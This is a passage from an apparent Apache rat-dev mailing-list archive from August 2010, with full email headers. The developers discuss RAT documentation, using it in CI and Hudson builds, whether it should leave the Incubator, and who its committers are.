https://issues.apache.org/jira/browse/IVYDE-250 > > > > --=20 I Am What I Am And That's All What I Yam (Popeye) From [email protected] Thu Aug 12 04:22:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94120 invoked from network); 12 Aug 2010 04:22:37 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Aug 2010 04:22:37 -0000 Received: (qmail 14614 invoked by uid 500); 12 Aug 2010 04:22:37 -0000 Delivered-To: [email protected] Received: (qmail 14563 invoked by uid 500); 12 Aug 2010 04:22:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14555 invoked by uid 99); 12 Aug 2010 04:22:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Aug 2010 04:22:34 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Aug 2010 04:22:28 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 9B47328985D1 for <[email protected]>; Thu, 12 Aug 2010 06:22:07 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id GDJUx07Akr5L for <[email protected]>; Thu, 12 Aug 2010 06:22:07 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id B7AF728985D2; Thu, 12 Aug 2010 06:22:05 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Documentation References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1061) Date: Thu, 12 Aug 2010 06:22:04 +0200 In-Reply-To: <[email protected]> ("Nicolas =?utf-8?Q?Lalev=C3=A9e=22's?= message of "Wed, 11 Aug 2010 22:05:52 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable On 2010-08-11, Nicolas Lalev=C3=A9e wrote: > I would like to use RAT for IvyDE, Jan started to set it up [1]. Now > I would need to "tune" it. So I am looking for documentation, and I > just cannot find any. Is there some ? where ? What Jochen said. I know you are using the Antlib so <http://svn.apache.org/repos/asf/incubator/rat/main/trunk/ant-task-examples= .xml> may give you some ideas. > Does RAT is supposed to be run against a source tree or the packaged > artifacts ready to be deployed on apache dist ? You can do either. The Antlib supported running against archives all the time, RAT's core supports it with 0.7. It's your choice. > Could rat be integrated into a CI build Sure. Gavin has set up several buildbot builds for a couple of projects that do that (all of them using the Antlib).=20=20 > so we can get notified if a commit break the Apache guidelines ? The Antlib only supports reporting while the Maven plugin can make a build fail if there are unapproved licenses. It simply never occured to me that you'd want your build to fail on unapproved licenses, that wouldn't be too difficult to add. If you want to stick with the Antlib you could try parsing the generated report and make the build fail if it doesn't contain a line "Unapproved Licenses: 0" or something like that. AntUnit's assertResourceDoesntContain could be an option. Stefan From [email protected] Thu Aug 12 09:00:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 681 invoked from network); 12 Aug 2010 09:00:31 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Aug 2010 09:00:31 -0000 Received: (qmail 40090 invoked by uid 500); 12 Aug 2010 09:00:31 -0000 Delivered-To: [email protected] Received: (qmail 40035 invoked by uid 500); 12 Aug 2010 09:00:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40026 invoked by uid 99); 12 Aug 2010 09:00:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Aug 2010 09:00:29 +0000 X-ASF-Spam-Status: No, hits=1.0 required=10.0 tests=SPF_HELO_PASS,SPF_SOFTFAIL X-Spam-Check-By: apache.org Received-SPF: softfail (athena.apache.org: transitioning domain of [email protected] does not designate 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mxout-08.mxes.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Aug 2010 09:00:21 +0000 Received: from pc-marianne.anyware (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp.mxes.net (Postfix) with ESMTPSA id 74E19509DC for <[email protected]>; Thu, 12 Aug 2010 05:00:00 -0400 (EDT) From: Nicolas =?utf-8?q?Lalev=C3=A9e?= <[email protected]> To: [email protected] Subject: Re: Documentation Date: Thu, 12 Aug 2010 10:59:28 +0200 User-Agent: KMail/1.9.10 References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Message-Id: <[email protected]> On Thursday 12 August 2010 06:22:04 Stefan Bodewig wrote: > On 2010-08-11, Nicolas Lalev=C3=A9e wrote: > > I would like to use RAT for IvyDE, Jan started to set it up [1]. Now > > I would need to "tune" it. So I am looking for documentation, and I > > just cannot find any. Is there some ? where ? > > What Jochen said. > > I know you are using the Antlib so > <http://svn.apache.org/repos/asf/incubator/rat/main/trunk/ant-task-exampl= es >.xml> may give you some ideas. ha, great. I will start from that. thanks. > > > Does RAT is supposed to be run against a source tree or the packaged > > artifacts ready to be deployed on apache dist ? > > You can do either. The Antlib supported running against archives all > the time, RAT's core supports it with 0.7. It's your choice. > > > Could rat be integrated into a CI build > > Sure. Gavin has set up several buildbot builds for a couple of projects > that do that (all of them using the Antlib). > > > so we can get notified if a commit break the Apache guidelines ? > > The Antlib only supports reporting while the Maven plugin can make a > build fail if there are unapproved licenses. It simply never occured to > me that you'd want your build to fail on unapproved licenses, that > wouldn't be too difficult to add. > > If you want to stick with the Antlib you could try parsing the generated > report and make the build fail if it doesn't contain a line "Unapproved > Licenses: 0" or something like that. AntUnit's > assertResourceDoesntContain could be an option. Yep, making the build fail maybe be too strong. Actually I was thinking of = rat=20 making the build "unstable" in hudson if anything goes wrong, but I would=20 need a dedicated hudson plugin which would understand rat's ouput. I think = I=20 will stick too just generating the reports for now. By the way, if I am enough motivated to start to implement a such hudson=20 plugin, would the rat project be interested in hosting the sources ? Nicolas From [email protected] Mon Aug 16 05:58:28 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73060 invoked from network); 16 Aug 2010 05:58:28 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Aug 2010 05:58:28 -0000 Received: (qmail 68963 invoked by uid 500); 16 Aug 2010 05:58:28 -0000 Delivered-To: [email protected] Received: (qmail 68916 invoked by uid 500); 16 Aug 2010 05:58:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68906 invoked by uid 99); 16 Aug 2010 05:58:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 05:58:25 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 05:58:18 +0000 Received: by qyk11 with SMTP id 11so2823111qyk.6 for <[email protected]>; Sun, 15 Aug 2010 22:57:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=rr6PcyUkrUNVplZY1b2xdl2OgnzuydFn9IOrQCT5pQk=; b=XFpZr1gRHE/9aQ7rXFENS5DnQPjbp1utr+/+62XjInUIGdXPx87xQnrHc5KuIms+4P SdnSWtYGVRhQDH6gT7RM99vlIuK5KgxJLoVAp86fg+YgMvv+shdc7IF+6qYPLpi0z5Pc yTt+1YvW3P4TRR2VSmAyx1MpwgPD87BfiS/9I= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=TdFJYBZ91lrXnVSWKY1oPtfLHqh8B+RmdR28Pb0VyYmi9FehNs0R/a2yz7OGxs52Fk vUIYI7mIFq/6QqQvuuTGRRx6U09hRx0M2SRFKFt5+thcsyyXi2RdAeIxablx7mjprSAk OPx56VtyNu4gN/mMdGrJZEqadwh7qvs8iBt3Q= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 34mr157560qcf.226.1281938278117; Sun, 15 Aug 2010 22:57:58 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 15 Aug 2010 22:57:58 -0700 (PDT) Date: Mon, 16 Aug 2010 07:57:58 +0200 Message-ID: <[email protected]> Subject: Part 2: Future of RAT From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Hi, now that the waves are flattened again, the first thing I should probably do is to apologize: Had I anticipated the multitude of reactions, I'd have put my question to this mailing list, rather than to several. However, I expected no more than 2 or 3 replies, that's why the broad audience seemed at the time to make sense. Now, back to the rat-dev list, I'd like to put the same question to you again: Isn't it time for RAT to leave the Incubator? And if so, what would be the target? Regardless of what was written in the first thread, I still feel that the project is small in all aspects that I can think of. That's why I clearly thought of becoming a subproject of another, like Commons. But I did neither expect the pressure in the direction of becoming a TLP (Greg Stein being interested), nor the lack of interest from the side of Commons. (The other TLP's mentioned should have even less. Personally I can't seem RAT related to Maven, or Ant. OTOH I do see a relationship of RAT as a tool of general interest with Commons.) Likewise, to me it seems misplaced in Infra. But the alternative, remaining in the Incubator is something which I consider to be worse in the medium term. To me, RAT is a project which could have skipped the Incubator right from the start. The less it should remain where it is. But all of these are, of course, my personal impressions and perhaps not shared by anyone else. Should the discussion be heading into the direction of RAT as a TLP (which I still view as the second best only) and the question of a chair become a problem, then I'd offer myself - as the third or fourth best option. Personally, I'd clearly prefer more experienced people like Robert, Stefan, or Henri. Jochen -- I Am What I Am And That's All What I Yam (Popeye) From [email protected] Mon Aug 16 20:15:33 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24648 invoked from network); 16 Aug 2010 20:15:32 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Aug 2010 20:15:32 -0000 Received: (qmail 2660 invoked by uid 500); 16 Aug 2010 20:15:32 -0000 Delivered-To: [email protected] Received: (qmail 2606 invoked by uid 500); 16 Aug 2010 20:15:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2598 invoked by uid 99); 16 Aug 2010 20:15:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 20:15:32 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 20:15:25 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id A070040E000A for <[email protected]>; Mon, 16 Aug 2010 22:15:04 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id twtEZhxpXx-X for <[email protected]>; Mon, 16 Aug 2010 22:15:03 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id EFF1840E0009; Mon, 16 Aug 2010 22:15:03 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Documentation References: <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1063) Date: Mon, 16 Aug 2010 22:15:01 +0200 In-Reply-To: <[email protected]> ("Nicolas =?utf-8?Q?Lalev=C3=A9e=22's?= message of "Thu, 12 Aug 2010 10:59:28 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable On 2010-08-12, Nicolas Lalev=C3=A9e wrote: > Actually I was thinking of rat making the build "unstable" in hudson > if anything goes wrong, but I would need a dedicated hudson plugin > which would understand rat's ouput. I think I will stick too just > generating the reports for now. I'd go with the XML output if I were you, the plain text putput is generated from the XML version internally anyway. > By the way, if I am enough motivated to start to implement a such > hudson plugin, would the rat project be interested in hosting the > sources ? It would absolutely be as much in scope of RAT the project as is the Antlib or the Maven plugin. Huson itself looks MIT licensed so a dependency on its API wouldn't pose a problem either. Stefan From [email protected] Mon Aug 16 20:42:00 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36643 invoked from network); 16 Aug 2010 20:42:00 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Aug 2010 20:42:00 -0000 Received: (qmail 43192 invoked by uid 500); 16 Aug 2010 20:42:00 -0000 Delivered-To: [email protected] Received: (qmail 43143 invoked by uid 500); 16 Aug 2010 20:41:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43135 invoked by uid 99); 16 Aug 2010 20:41:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 20:41:59 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 20:41:53 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 5EFB840E000A for <[email protected]>; Mon, 16 Aug 2010 22:41:32 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id Gl+n-rHRKIV2 for <[email protected]>; Mon, 16 Aug 2010 22:41:31 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id D17E240E0009; Mon, 16 Aug 2010 22:41:31 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1064) Date: Mon, 16 Aug 2010 22:41:31 +0200 In-Reply-To: <[email protected]> (Jochen Wiedmann's message of "Mon, 16 Aug 2010 07:57:58 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-08-16, Jochen Wiedmann wrote: > now that the waves are flattened again, The results have been interesting, looks as if many people outside of the RAT development team feel strongly about RAT. 8-) > Now, back to the rat-dev list, I'd like to put the same question to > you again: Isn't it time for RAT to leave the Incubator? And if so, > what would be the target? In order to answer this properly we must also address Niall's concerns that are all but unfounded. Are all PPMC members actually aware that they are on board? Could everybody who is a member of the PPMC please check they are actually subscribed to rat-private? If RAT is going anywhere we must ensure it has enough people who care - of which there seem to be plenty, they may need to be recruited, though. > Regardless of what was written in the first thread, I still feel that > the project is small in all aspects that I can think of. That's why I > clearly thought of becoming a subproject of another, like Commons. I understand that. From where I stand RAT has just been a tool like David's clutch or many other tools that have been developed to upgrade licenses or whatever. That's why infra or the incubator itself appeals to me. > But I did neither expect the pressure in the direction of becoming a > TLP (Greg Stein being interested), nor the lack of interest from the > side of Commons. I do understand that Commons feels RAT doesn't fit its scope. > But the alternative, remaining in the Incubator is something which I > consider to be worse in the medium term. I'd consider the Incubator as a target as a graduated subproject, not as an eternal podling. > Should the discussion be heading into the direction of RAT as a TLP > (which I still view as the second best only) and the question of a > chair become a problem, then I'd offer myself If we get there, I for one would gratefully accept your offer ;-) Stefan From [email protected] Mon Aug 16 21:37:29 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66767 invoked from network); 16 Aug 2010 21:37:29 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Aug 2010 21:37:29 -0000 Received: (qmail 26541 invoked by uid 500); 16 Aug 2010 21:37:29 -0000 Delivered-To: [email protected] Received: (qmail 26491 invoked by uid 500); 16 Aug 2010 21:37:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26483 invoked by uid 99); 16 Aug 2010 21:37:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 21:37:28 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=MIME_QP_LONG_LINE,RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Aug 2010 21:37:18 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1Ol7MY-0001ke-JB for [email protected]; Mon, 16 Aug 2010 21:36:58 +0000 Received: from 5e079041.bb.sky.com ([161.129.204.104] helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtps (TLSv1:AES128-SHA:128) (Exim 4.69) (envelope-from <[email protected]>) id 1Ol7MW-0004A7-M5 for [email protected]; Mon, 16 Aug 2010 22:36:58 +0100 References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Mime-Version: 1.0 (iPhone Mail 8A293) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> Cc: "[email protected]" <[email protected]> X-Mailer: iPhone Mail (8A293) From: Ross Gardler <[email protected]> Subject: Re: Part 2: Future of RAT Date: Mon, 16 Aug 2010 22:36:45 +0100 To: "[email protected]" <[email protected]> X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - incubator.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org X-Virus-Checked: Checked by ClamAV on apache.org On 16 Aug 2010, at 21:41, Stefan Bodewig <[email protected]> wrote: > On 2010-08-16, Jochen Wiedmann wrote: >=20 ... > If RAT is going anywhere we must ensure it has enough people who care - > of which there seem to be plenty, they may need to be recruited, though. Well, as a mentor of RAT, a user outside the ASF and an early contributor I w= ould most likely be involved in a small way - if there is a community to tur= n RAT into what it claims to be, a release audit tool. Although note I'm onl= y a mentor and early contributor, not a committed.=20 I think the general "RAT is great" vibe of the discussion was misrepresentat= ive of what RAT currently is. There is not much to RAT at present other than= a very complex pattern matcher that ensures license headers are present.=20= It does not audit releases and to pretend it does is dangerous.=20 So where is RAT going with respect to functionality. Is it really "complete"= in it's current form, as some people have suggested? Don't get me wrong, it's a great tool for a very limited use case (I do use i= t outside the ASF), but a top level project that stops at that functionality= is not likely to draw more patches from me since there are other more compl= ete tools that fill my wider audit needs (albeit not Apache licensed). In a similar vein, If RAT really is done then why do we need contributors on= board at all? I think whether it is done or not should influence where it goes since the c= ompleteness or otherwise of the strategic goals of the project will affect w= hether people are on board or not.=20 Ross >=20 From [email protected] Tue Aug 17 05:10:49 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61431 invoked from network); 17 Aug 2010 05:10:49 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 05:10:49 -0000 Received: (qmail 49620 invoked by uid 500); 17 Aug 2010 05:10:49 -0000 Delivered-To: [email protected] Received: (qmail 49570 invoked by uid 500); 17 Aug 2010 05:10:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49562 invoked by uid 99); 17 Aug 2010 05:10:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 05:10:46 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 05:10:38 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id DBA8D40E000A for <[email protected]>; Tue, 17 Aug 2010 07:10:17 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id mXw7U-3beAmO for <[email protected]>; Tue, 17 Aug 2010 07:10:16 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 213EA40E0009; Tue, 17 Aug 2010 07:10:16 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Committers (was Re: Part 2: Future of RAT) References: <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1067) Date: Tue, 17 Aug 2010 07:10:16 +0200 In-Reply-To: <[email protected]> (Ross Gardler's message of "Mon, 16 Aug 2010 22:36:45 +0100") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org [splitting this part out of the thread because it would distract from the rest of my response in a different email] On 2010-08-16, Ross Gardler wrote: > Although note I'm only a mentor and early contributor, not a > committed. You are one of the four committers who have been voted in last December, together with Gav, Niall and David. Stefan From [email protected] Tue Aug 17 05:29:09 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68266 invoked from network); 17 Aug 2010 05:29:09 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 05:29:09 -0000 Received: (qmail 66651 invoked by uid 500); 17 Aug 2010 05:29:09 -0000 Delivered-To: [email protected] Received: (qmail 66603 invoked by uid 500); 17 Aug 2010 05:29:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66595 invoked by uid 99); 17 Aug 2010 05:29:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 05:29:07 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 05:29:01 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id EEB7640E000A for <[email protected]>; Tue, 17 Aug 2010 07:28:38 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id DsIMv-rd3mub for <[email protected]>; Tue, 17 Aug 2010 07:28:38 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 5581D40E0009; Tue, 17 Aug 2010 07:28:37 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1067) Date: Tue, 17 Aug 2010 07:28:36 +0200 In-Reply-To: <[email protected]> (Ross Gardler's message of "Mon, 16 Aug 2010 22:36:45 +0100") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-08-16, Ross Gardler wrote: > I think the general "RAT is great" vibe of the discussion was > misrepresentative of what RAT currently is. There is not much to RAT > at present other than a very complex pattern matcher that ensures > license headers are present. > It does not audit releases and to pretend it does is dangerous. Many, many thanks Ross. I finally start getting the whole thread. All the time I knew I must be missing something but completely failed to grasp that people were looking at RAT for more than what it currently is. I completely agree with your description of RAT's current state but I never expected it to be more - that's why I said its scope (not its code base) was too small for a TLP. > So where is RAT going with respect to functionality. Is it really > "complete" in it's current form, as some people have suggested? As one of the people who suggested it was complete, my answer is yes, but only because I never envisioned RAT to be more. I just re-read <http://wiki.apache.org/incubator/RatProposal> and obviously RAT is not there, yet. OTOH I doubt that extending RAT beyond what it currently does is on anybody's agenda, at least it is not on mine. Stefan From [email protected] Tue Aug 17 07:50:25 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19912 invoked from network); 17 Aug 2010 07:50:25 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 07:50:25 -0000 Received: (qmail 84849 invoked by uid 500); 17 Aug 2010 07:50:25 -0000 Delivered-To: [email protected] Received: (qmail 84798 invoked by uid 500); 17 Aug 2010 07:50:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84774 invoked by uid 99); 17 Aug 2010 07:50:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 07:50:22 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 07:50:13 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1OlGvf-00082M-SB for [email protected]; Tue, 17 Aug 2010 07:49:51 +0000 Received: from 5addf462.bb.sky.com ([161.129.204.104] helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtps (TLSv1:AES128-SHA:128) (Exim 4.69) (envelope-from <[email protected]>) id 1OlGvf-00045l-KJ for [email protected]; Tue, 17 Aug 2010 08:49:51 +0100 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Mime-Version: 1.0 (iPhone Mail 8A293) Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Message-Id: <[email protected]> Cc: "[email protected]" <[email protected]> X-Mailer: iPhone Mail (8A293) From: Ross Gardler <[email protected]> Subject: Re: Committers (was Re: Part 2: Future of RAT) Date: Tue, 17 Aug 2010 08:49:41 +0100 To: "[email protected]" <[email protected]> X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - incubator.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - 